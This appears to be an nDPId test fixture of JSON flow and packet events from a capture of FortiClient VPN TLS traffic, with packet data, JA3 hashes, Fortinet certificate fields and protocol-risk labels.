00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1621067206833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067206833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF0KMspKYnKzXsyaYAQECxOAgAAAQEICienSPMGP5Hk"}
01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067209199,"flow_last_seen":1621067209199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067209199,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621067209199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067209199,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF8KMsekCMzAAAAALAC\/\/8eiQAAAgQFtAEDAwUBAQgKJ6dSCQAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1621067209262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067209262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA81pJAADQGLXFSUS4NwKgBsijL8XxcuXqIHpAjNKASOECG6AAAAgQFrAQCCAoGP5LWJ6dSCQEDAwo="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1621067209262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067209262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF8KMsekCM0XLl6iYAQECzdhQAAAQEICienUkcGP5LW"}
01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01474{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00959{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00964{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067203571,"flow_last_seen":1621067203571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067203571,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621067203571,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067203571,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFtKMutlmzOAAAAALAC\/\/9bnAAAAgQFtAEDAwUBAQgKJ6c8YwAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621067203633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067203633,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8pJBAADQGX3NSUS4NwKgBsijL8W1kEcpBrZZsz6ASOEBvHAAAAgQFrAQCCAoGP5CkJ6c8YwEDAwo="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621067203633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067203633,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFtKMutlmzPZBHKQoAQECzFugAAAQEICienPKAGP5Ck"}
01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01129{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067204622,"flow_last_seen":1621067204622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067204622,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621067204622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067204622,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFuKMux1NwAAAAAALAC\/\/\/kHgAAAgQFtAEDAwUBAQgKJ6dAbwAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621067204682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067204682,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8DZFAADQG9nJSUS4NwKgBsijL8W6yVLN5sdTcAaASOEC\/ugAAAgQFrAQCCAoGP5ENJ6dAbwEDAwo="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621067204682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067204682,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFuKMux1NwBslSzeoAQECwWWwAAAQEICienQKoGP5EN"}
01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067205651,"flow_last_seen":1621067205651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067205651,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
